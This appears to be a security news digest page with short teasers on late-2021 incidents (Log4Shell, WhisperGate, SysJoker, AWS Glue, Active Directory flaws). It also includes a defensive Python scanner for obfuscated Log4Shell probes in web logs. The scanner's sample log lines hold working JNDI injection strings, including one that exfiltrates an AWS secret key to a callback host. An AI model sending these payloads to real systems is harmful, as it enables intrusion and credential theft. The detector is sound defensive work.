DHL was the most imitated brand in phishing campaigns throughout Q4 2021, pushing Microsoft to second place, and Google to fourth. This isn’t surprising considering that the final quarter of every year includes the Black Friday, Cyber Monday, and Christmas shopping season, so phishing lures based on package deliveries naturally increase. DHL is an international …

DHL dethrones Microsoft as most imitated brand in phishing attacks Read More »

Microsoft: Fake ransomware targets Ukraine in data-wiping attacks

Microsoft is warning of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine. Starting January 13th, Microsoft detected the new attacks that combined a destructive MBRLocker with a data-corrupting malware used to destroy the victim’s data intentionally. A two-stage attack destroys data Microsoft calls this new malware family ‘WhisperGate’ …

Microsoft: Fake ransomware targets Ukraine in data-wiping attacks Read More »

AWS Patches Glue Bug That Put Customer Data at Risk

Researchers have discovered a critical vulnerability in the AWS Glue service, which could allow remote attackers to access sensitive data owned by large numbers of customers. Dubbed “Superglue” by the Orca Security Research Team, the bug was made possible by an internal misconfiguration within the service. AWS Glue is a serverless data integration service that allows …

AWS Patches Glue Bug That Put Customer Data at Risk Read More »

New Windows Server updates cause DC boot loops, break Hyper-V

The latest Windows Server updates are causing severe issues for administrators, with domain controllers rebooting spontaneously, Hyper-V failing to start, and ReFS volumes becoming inaccessible until the updates are rolled back. Yesterday, Microsoft released the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update, and the Windows Server 2022 KB5009555 update as part …

New Windows Server updates cause DC boot loops, break Hyper-V Read More »

TellYouThePass ransomware returns as a cross-platform Golang threat

TellYouThePass ransomware has re-emerged as Golang-compiled malware, making it easier to target additional operating systems, macOS and Linux in particular. The return of this malware strain was noticed last month, when threat actors used it in conjunction with the Log4Shell exploit to target vulnerable machines. Now, a report from CrowdStrike sheds more light on this …

TellYouThePass ransomware returns as a cross-platform Golang threat Read More »

New SysJoker backdoor targets Windows, macOS, and Linux

A new multi-platform backdoor malware named ‘SysJoker’ has emerged in the wild, targeting Windows, Linux, and macOS with the ability to evade detection on all three operating systems. The discovery of the new malware comes from researchers at Intezer who first saw signs of its activity in December 2021 after investigating an attack on a …

New SysJoker backdoor targets Windows, macOS, and Linux Read More »

Health Ministry Responds to Massive Data Leak of Medical Records

Reports have emerged of an alleged massive leak of Indonesian hospital patients’ medical information being sold on an illegal internet forum. The hackers claimed to have breached the Indonesian Health Ministry’s centralized server to obtain the data. According to a report by Antaranews, the data sold on the dark web contains 720 GB of personal medical information from …

Health Ministry Responds to Massive Data Leak of Medical Records Read More »

Attackers Exploit Flaw in Google Docs’ Comments Feature

A wave of phishing attacks identified in December, targeting mainly Outlook users, is difficult for both email scanners and victims to flag, researchers said. Attackers are using the “Comments” feature of Google Docs to send malicious links in a phishing campaign aimed primarily at Outlook users, researchers have discovered. Researchers from email collaboration and security …

Attackers Exploit Flaw in Google Docs’ Comments Feature Read More »

Apache found critical bugs in httpd web server

Apache, whose name has been in the news for the past two weeks because of the severe vulnerability in its Log4j logging library, has issued yet another update. This time it has nothing to do with the Log4j vulnerability (dubbed Log4Shell): Apache issued a patch addressing two CVE-numbered flaws affecting the httpd server. According to the cybersecurity …

Apache found critical bugs in httpd web server Read More »

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities

Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems. “Exploitation attempts and testing have remained high during the last weeks of December,” Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. “We have …

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities Read More »

Another T-Mobile cyberattack reportedly exposed customer info and SIMs

T-Mobile has suffered another cyberattack after being rocked by a massive data breach in August. This time around, attackers accessed “a small number of” customers’ accounts, according to documents posted by The T-Mo Report. According to the report, customers either fell victim to a SIM swapping attack (which could allow someone to bypass SMS-powered two-factor authentication), had personal plan information …

Another T-Mobile cyberattack reportedly exposed customer info and SIMs Read More »

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

Researchers from CrowdStrike disrupted an attempt by the threat group to steal industrial intelligence and military secrets from an academic institution. The group tracked as Aquatic Panda is the latest advanced persistent threat (APT) to exploit the Log4Shell vulnerability. Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a …

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools Read More »

Log4j zero-day vulnerability: What you need to know

The security hole in Log4j, a Java library for logging error messages in applications, is the most notorious security vulnerability on the internet right now and carries a severity score of 10 out of 10. The library is developed by the open-source Apache Software Foundation and is a core part of the Java logging framework. Since last week, a warning from CERT New Zealand has stated …

Log4j zero-day vulnerability: What you need to know Read More »
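The three Log4j items above (Microsoft’s warning of continued exploitation, the Aquatic Panda intrusions, and this explainer) all come down to the same detection problem for a SOC: attackers send `${jndi:...}` lookups in any logged field, and they obfuscate them with Log4j’s own nested lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) so that a naive search for `jndi:` misses them. The Python below is an added example written for this page, not code from Microsoft, CrowdStrike or the Log4j project. It URL-decodes a log line, collapses nested lookups innermost-first (the order Log4j evaluates them), and then looks for a JNDI lookup in the normalized text. The web-server log lines are constructed, with documentation-range IP addresses.

```python
"""Added example (not Microsoft's, CrowdStrike's or Log4j's code): detecting
Log4Shell (${jndi:...}) probes in web logs, including the obfuscated forms
attackers used. Sample log lines below are constructed."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: a body with no further $, { or } inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
IS_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)
JNDI_URI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/\s}]+)", re.I)
# Sentinels wrap lookups we keep (jndi:, env:, ...) so they do not re-match
# INNERMOST on the next pass; they are turned back into ${...} at the end.
OPEN, CLOSE = "\x02", "\x03"

# Constructed Apache/nginx-style access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:24 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [13/Dec/2021:10:01:25 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:26 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:${lower:L}dap://203.0.113.4/${env:AWS_SECRET_ACCESS_KEY}}"',
    '10.0.0.2 - - [13/Dec/2021:10:01:27 +0000] "GET /docs/${version} HTTP/1.1" 200 9 "-" "Mozilla/5.0"',
]


def _resolve(body):
    """Collapse one innermost lookup the way Log4j 2's string substitution does:
    ${x:-default} -> default, ${lower:X} -> x, ${upper:x} -> X; anything else
    (jndi:, env:, sys:, date:, ...) is kept verbatim for inspection."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, sep, value = body.partition(":")
    if sep and key.strip().lower() == "lower":
        return value.lower()
    if sep and key.strip().lower() == "upper":
        return value.upper()
    return OPEN + body + CLOSE


def normalize(text, max_passes=50):
    """URL-decode, then repeatedly collapse innermost lookups until stable.
    max_passes bounds work on hostile input with absurd nesting depth."""
    s = unquote(text)
    for _ in range(max_passes):
        new = INNERMOST.sub(lambda m: _resolve(m.group(1)), s)
        if new == s:
            break
        s = new
    return s.replace(OPEN, "${").replace(CLOSE, "}")


def scan_log_lines(lines):
    """Return one hit per line containing a JNDI lookup after normalization,
    with the callback scheme and host when the lookup carries a URI."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if not IS_JNDI.search(norm):
            continue
        m = JNDI_URI.search(norm)
        hits.append({
            "line": n,
            "scheme": m.group(1).lower() if m else None,
            "host": m.group(2) if m else None,
            "normalized": norm,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['host']}")
```

Lines 3 to 5 of the sample are exactly the cases a plain `grep jndi` misses or underreports: URL-encoded, assembled entirely from `${::-x}` default-value tricks, and a lookup that also tries to exfiltrate an environment variable in the callback path. The extracted callback hosts are what you would hand to the network team to check for outbound LDAP or RMI connections from the affected servers.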

Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security

Apple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to “trivially and reliably” bypass a “myriad of foundational macOS security mechanisms” and run arbitrary code. Security researcher Patrick Wardle detailed the discovery in a series of tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the …

Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security Read More »

4-Year-Old Microsoft Azure Zero-Day Exposes Web App Source Code

The security vulnerability could expose passwords and access tokens, along with blueprints for internal infrastructure that help in finding software vulnerabilities. The Microsoft Azure App Service has a four-year-old vulnerability that could reveal the source code of web apps written in PHP, Python, Ruby or Node that were deployed using Local Git, researchers said. The bug has …

4-Year-Old Microsoft Azure Zero-Day Exposes Web App Source Code Read More »

Two Active Directory Bugs Lead to Easy Windows Domain Takeover

Microsoft is urging customers to patch two Active Directory domain controller bugs after a PoC tool was publicly released on Dec. 12. A proof-of-concept tool has been published that leverages two Windows Active Directory bugs fixed last month that, when chained, can allow easy Windows domain takeover. In a Monday alert, Microsoft urged organizations to immediately …

Two Active Directory Bugs Lead to Easy Windows Domain Takeover Read More »